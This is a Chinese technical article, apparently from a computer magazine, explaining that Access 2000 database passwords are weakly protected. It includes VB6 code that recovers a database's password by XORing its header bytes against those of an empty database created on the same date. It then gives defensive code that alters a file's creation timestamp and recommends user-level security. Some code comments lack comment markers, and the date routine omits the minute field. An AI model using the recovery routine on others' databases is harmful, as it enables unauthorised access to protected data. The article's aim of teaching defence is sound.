如果你過分信任 Access 2000數(shù)據(jù)庫的密碼保護，你可能會因此而蒙受損失。這是因為Access 2000的數(shù)據(jù)庫級密碼并不安全，相反它很脆弱，甚至下面這段非常小的程序就可以攻破它：
��
程序一（VB6）：Access 2000密碼破譯
Private Sub Command1_Click()
Const Offset = &H43 文件偏移地址：Access數(shù)據(jù)庫從此處開始存放加密密碼
Dim bEmpty(1 To 2) As Byte, bPass(1 To 2) As Byte
Dim i As Integer, Password As String
打開一個空數(shù)據(jù)庫作為參照
Open "D:\VB6_Test\MDB_Password\New_Empty_DB.mdb" For Binary As #1
打開被密碼保護的數(shù)據(jù)庫
Open "D:\VB6_Test\MDB_Password\Pass_Protected_DB.mdb" For Binary As #2
Seek #1, Offset
Seek #2, Offset
For i = 1 To 20 ' Access 2000 數(shù)據(jù)庫密碼最長允許20位
Get #1, , bEmpty ' 其中每位密碼占兩個字節(jié)
Get #2, , bPass ' 一個漢字也僅是一位密碼，占兩個字節(jié)
If (bEmpty(1) Xor bPass(1)) <> 0 Then
Password = Password + Chr(bEmpty(1) Xor bPass(1)) ' 將密碼解密
End If
Next
Close 1, 2
MsgBox "Password:" + Password ' 顯示密碼
End Sub

一、深入分析
上述程序成功的關鍵是使用了一個空數(shù)據(jù)庫（New_Empty_DB.mdb）。該數(shù)據(jù)庫的創(chuàng)建日期必須與被密碼保護的數(shù)據(jù)庫（Pass_Protected_DB.mdb）相一致。 換句話說，Access 2000 僅僅是使用“數(shù)據(jù)庫創(chuàng)建日期”來加密用戶密碼。

應注意的是：上面的“創(chuàng)建日期”只是操作系統(tǒng)級的，也就是 Windows記錄在文件夾目錄里的信息（根據(jù)文件名的長短，每個文件在目錄里占用至少32個字節(jié)，包括：文件名、屬性、文件大小、首蔟號、創(chuàng)建時間、修改時間和訪問時間等）。
Access 2000 在數(shù)據(jù)庫中也記錄了該數(shù)據(jù)庫的“創(chuàng)建日期”。加密數(shù)據(jù)庫密碼的正是數(shù)據(jù)庫內(nèi)部記錄的這個“創(chuàng)建日期”。該日期只有在數(shù)據(jù)庫被成功打開后才能看到。但在一般情況下，操作系統(tǒng)級的以及數(shù)據(jù)庫內(nèi)保存的“創(chuàng)建日期”是完全一樣的，因此這為破譯者提供了方便。
上述程序中還有一點需要說明：為簡明起見，解密密碼時僅處理了雙字節(jié)的首字節(jié)，因此它僅對非漢字密碼有效。若要解密漢字密碼，須對雙字節(jié)均做處理。
二、防范措施
1、隱藏“創(chuàng)建日期”
從上面的分析可以看出，既然“創(chuàng)建日期”是破譯的關鍵，那么我們應“對癥下藥”，將真實的“創(chuàng)建日期”隱藏起來。
第一步，創(chuàng)建數(shù)據(jù)庫時，使用一個“不可思議的、別人不易猜測”的日期。做法為：修改 Windows系統(tǒng)日期，例如改為2026年05月15日，創(chuàng)建數(shù)據(jù)庫后再將系統(tǒng)日期改回。這個“不可思議”的日期即為該數(shù)據(jù)庫的真實“創(chuàng)建日期”。
第二步，修改操作系統(tǒng)級的“創(chuàng)建日期”。上述第一步完成后，該數(shù)據(jù)庫在操作系統(tǒng)級的創(chuàng)建日期也是2026年05月15日，必須加以修改，以達到隱藏真實創(chuàng)建日期的目的。修改操作系統(tǒng)級的“創(chuàng)建日期”可以由下面的程序二完成。
��
程序二（VB6）：修改文件在操作系統(tǒng)級的“創(chuàng)建日期”
Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type SYSTEMTIME
wYear As Integer
wMonth As Integer
wDayOfWeek As Integer
wDay As Integer
wHour As Integer
wMinute As Integer
wSecond As Integer
wMilliseconds As Integer
End Type
Private Const GENERIC_WRITE = &H40000000
Private Const OPEN_EXISTING = 3
Private Const FILE_SHARE_READ = &H1
Private Const FILE_SHARE_WRITE = &H2
Private Declare Function SetFileTimeWrite Lib "kernel32" Alias _
"SetFileTime" (ByVal hFile As Long, lpCreateTime As FILETIME, _
ByVal NullP As Long, ByVal NullP2 As Long) As Long
Private Declare Function SystemTimeToFileTime Lib "kernel32" _
(lpSystemTime As SYSTEMTIME, lpFileTime As FILETIME) As Long
Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" _
(ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal _
dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal _
dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, _
ByVal hTemplateFile As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) _
As Long
Private Declare Function LocalFileTimeToFileTime Lib "kernel32" _
(lpLocalFileTime As FILETIME, lpFileTime As FILETIME) As Long
Private Sub Command1_Click()
Dim Year As Integer, Month As Integer, Day As Integer
Dim Hour As Integer, Minute As Integer, Second As Integer
Dim TimeStamp As Variant, Filename As String, X As Integer
Year = 2001: Month = 3: Day = 13 ' 準備設定的“創(chuàng)建日期”
Hour = 12: Minute = 0: Second = 26
TimeStamp = DateSerial(Year, Month, Day) + TimeSerial(Hour, Minute, Second)
Filename = "D:\VB6_Test\MDB_Password\Pass_Protected_DB.mdb" ' 目標文件名
X = ModifyFileStamp(Filename, TimeStamp)
End Sub
Function ModifyFileStamp(Filename As String, TimeStamp As Variant) As Integer
Dim X As Long, Handle As Long, System_Time As SYSTEMTIME
Dim File_Time As FILETIME, Local_Time As FILETIME
System_Time.wYear = Year(TimeStamp): System_Time.wMonth = Month(TimeStamp)
System_Time.wDay = Day(TimeStamp)
System_Time.wDayOfWeek = Weekday(TimeStamp) - 1
System_Time.wHour = Hour(TimeStamp): System_Time.wSecond = Second(TimeStamp)
System_Time.wMilliseconds = 0
X = SystemTimeToFileTime(System_Time, Local_Time)
X = LocalFileTimeToFileTime(Local_Time, File_Time) ' 轉(zhuǎn)換成可用的類型
Handle = CreateFile(Filename, GENERIC_WRITE, FILE_SHARE_READ Or _
FILE_SHARE_WRITE, ByVal 0&, OPEN_EXISTING, 0, 0) ' 打開文件
X = SetFileTimeWrite(Handle, File_Time, ByVal 0&, ByVal 0&) ' 設置日期
CloseHandle Handle ' 關閉文件
End Function
圖三顯示的是數(shù)據(jù)庫的真實“創(chuàng)建日期”以及經(jīng)程序二偽裝的操作系統(tǒng)級的“假象”日期。

可以看出，隱藏“創(chuàng)建日期”的方法對破譯者來說只是增大了破譯的工作量，增加了破解試驗的次數(shù)。只有將該方法與下述的“方法二”相結合，才能達到“既治標又治本”的效果。不過在一般的情況下“方法一”已夠用，因為如果破譯者起始使用的測試日期與最終的真實日期相差百年，他需要付出數(shù)萬次的努力！
2、使用用戶級安全機制
通過設置不同的用戶帳號和組帳號對數(shù)據(jù)庫中的各種資源進行權限管理。這種加強了的安全機制雖然給日常使用（尤其是單用戶使用）帶來了不便，但在有安全隱患的地方依然有設置的必要。
設置各種帳號及相應權限的簡單方法是使用“設置安全機制向?qū)А保ㄒ妶D四）。圖四還顯示了安全機制啟動后要求用戶登錄的畫面。

三、結論
所謂“道高一尺魔高一丈”，因為這世上并沒有絕對的安全。上述方法一的目的是提高破譯的成本以達到常人難以接受的程度；而方法二的初衷是增加密碼的數(shù)量。兩種方法的結合足以使破譯者望而卻步。不過這并不意味著百分之百的安全。但從思想上提高安全意識，防患于未然，這畢竟是正確的選擇。

關鍵字：Access 2000、數(shù)據(jù)庫、權限

【 頂部 】 【 關閉 】